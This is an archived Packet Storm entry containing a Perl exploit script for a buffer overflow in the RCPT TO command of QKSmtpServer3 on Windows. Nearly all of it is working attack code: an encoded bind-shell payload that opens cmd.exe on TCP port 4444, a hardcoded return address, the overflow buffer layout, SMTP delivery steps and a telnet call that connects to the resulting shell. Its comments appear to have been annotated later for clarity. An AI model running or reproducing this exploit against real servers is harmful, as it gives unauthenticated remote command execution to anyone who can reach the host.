qksmtp.pl.txt

2007-01-02T00:00:00
ID PACKETSTORM:53347
Type packetstorm
Reporter acaro
Modified 2007-01-02T00:00:00

Description

                                        
                                            `#!/bin/perl  
#  
#http://www.securityfocus.com/bid/20681  
#  
# tested on winXp Pro SP0 English / winXp Pro SP2 Italian / win 2k SP4 Italian and English;
# the return address is universal across these because it lies inside QKSmtpServer3.exe itself (see $eip below), not in an OS DLL
# binds a remote cmd.exe on the target host on port 4444 (reachable by anyone who can connect to it); based on expanders' original exploit
# credit to Greg Linares for discovering the vulnerability
# thanks to hdm and vlads902 for the original shellcode; encoded with SkyLined's alpha2 tool
# Jacopo Cervini aka acaro [at] jervus.it  
  
  
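# Usage banner.  The original printed this and then carried on with an
# undefined target (failing later on the connect); stop here instead.
if (@ARGV < 1) {
    print "--------------------------------------------------------------------\n";
    print "Usage : qksmtp-rcpt-overflow-4444.pl TargetIPAddress \n";
    print " Example : ./qksmtp-rcpt-overflow-4444.pl 127.0.0.1 \n";
    print "--------------------------------------------------------------------\n";
    exit 1;
}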
  
  
  
use IO::Socket::INET;  
  
my $port = 25;                   # SMTP; the vulnerable command is RCPT TO
my $host = shift @ARGV;          # target address, first CLI argument
my $reply;                       # most recent server response
my $request;                     # next command line to send

#my $eip = pack('V', 0x43434343);   # debug value: crash with EIP=0x43434343 to confirm the overwrite

# 0x0046298f is a "call esp" inside QKSmtpServer3.exe (little-endian on the wire),
# which is why the header reports the same address working across OS versions.
my $eip = pack('V', 0x0046298f);
  
  
  
# Alphanumeric bind-shell payload: listens on TCP 4444 and serves cmd.exe
# (per the header; original shellcode credited to hdm/vlads902, encoded with
# alpha2).  Presumably kept alphanumeric so every byte survives the server's
# RCPT TO handling -- TODO confirm which characters the parser rejects.
# The leading "PPYAIAI..." run is presumably the alpha2 decoder stub that
# rebuilds the real code at run time; not decoded here.
# NOTE(review): package global, not `my` -- the script does not use strict.
$sc=
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZ".
"BABABABABkMAGB9u4JBYlQZjKNmiXkIyokOkOOptKplmTo4RkQ5oL2kCLm5PxkQJORkPOLX4KOoKpIqjKOYtKP4DKkQZNp1upryVLqtWP".
"44LGWQgZjmjaXBJKL4MkntktnHt5IURkqOnDkQzKqVRkLLNkRkQOMLM1xkm3NLTKQyBLO4mLoqy3lqIK34rkmsLptKQ0LL4KppmL4mdKM".
"pKXOnaX4N0NLNjLNpKOz6ovOcRFOxlsOBphSGRSoBaOOdkOXPRH8KjMKLOKpPkO6vQOTIXeOve1JMm8JbnuqZKRkOHPbH7izizUvMPWYo".
"6vnsOcQCb3PSMsNsOSNskOfp1VqXLQ1LrFnsu99QTUQXTdMJ2PewqGkOVvqZZpnqPUkOXPph3tTmNNZINwKO6vns0UKO6pOxIUoYBfa9r".
"7Yo6vb00TOdR5YoHP3cRHgwRYGVbYnwkOJ6OeyoJ0s60j1T36OxqSrMU9jEozPPPYNIxLQyzGrJmtriYRnQGPZSdjkNORlmynMrnL63Bm".
"PznXvKFKVKqXPrKNvSMFyoD5Mtyo6vqKPWPRPQoaNqbJkQpQpQoepQKOfpOxtmz9m58NNsiovv2JYoyoLw9oVpDK27ilqsvds4KOWfpRk".
"OvpOxhp1zitOonsKOyFKO6pA";
  
  
# 63-byte trailer appended after the 0x45 padding in $buffer.  The author's
# name suggests it jumps back into $sc; the real bytes are interleaved with
# 0x73, the same byte used as filler in $buffer.  Not decoded here.
# Structure: 3 two-byte pairs, 13 x "\xb0\x48\x73", 7 x "\x40\x73", 2 pairs.
# NOTE(review): package global, not `my` -- the script does not use strict.
$jmpback =
      "\x50\x73\x54\x73\x58\x73"
    . ("\xb0\x48\x73" x 13)
    . ("\x40\x73" x 7)
    . "\x50\x73\xc3\x73";
  
# Overflow string carried in the RCPT TO argument, in wire order:
#   296 x 'A'    - filler; presumably the distance to the saved return address
#   $eip         - "call esp" in QKSmtpServer3.exe
#   2228 x 0x73  - filler between the return address and the payload
#   $sc          - alphanumeric bind-shell payload
#   820 x 'E'    - filler
#   $jmpback     - trailing byte sequence (see its definition)
#   0x00         - terminator
my $buffer = join '',
    ("\x41" x 296),
    $eip,
    ("\x73" x 2228),
    $sc,
    ("\x45" x 820),
    $jmpback,
    "\x00";
  
  
  
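# --- Deliver the overflow over SMTP, then attach to the resulting bind shell ---

# Send one command line (CRLF appended) and echo a progress line.
# Dies if send() fails; the original ignored its return value.
sub send_line {
    my ($sock, $line, $label) = @_;
    defined send($sock, $line . "\r\n", 0)
        or die "send failed ($label): $!\n";
    print "[+] Sent $label request\n";
    return;
}

# Read up to 1024 bytes of server reply and echo it.  Dies if recv() fails;
# an empty string (peer closed) is returned as-is.
sub read_reply {
    my ($sock) = @_;
    my $data = '';
    defined recv($sock, $data, 1024, 0)
        or die "recv failed: $!\n";
    print "Response:" . $data;
    return $data;
}

my $socket = IO::Socket::INET->new(
    proto    => 'tcp',
    PeerAddr => $host,
    PeerPort => $port,
) or die "Cannot connect to host!\n";

# Banner, then the minimal envelope needed to reach RCPT TO.
read_reply($socket);

send_line($socket, "helo acaro", "helo");
read_reply($socket);
sleep(1);

send_line($socket, "mail from: acaro@peaceandlove.peace", "mail from");
read_reply($socket);
sleep(1);

# The oversized recipient is what triggers the overflow.  No reply is read:
# if the payload runs, the server never answers this command.
send_line($socket, "rcpt to: " . $buffer, "rcpt to");

# The payload is an unauthenticated bind shell: anyone who can reach port 4444
# on the target gets cmd.exe, not only this client.  Give it a moment to start
# listening, then run telnet in list form so $host (taken from the command
# line) is never interpreted by a shell.
print " + connect on 4444 port of $host ...\n";
sleep(3);
system('telnet', $host, '4444') == -1
    and warn "could not run telnet: $!\n";
close $socket;
exit;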
`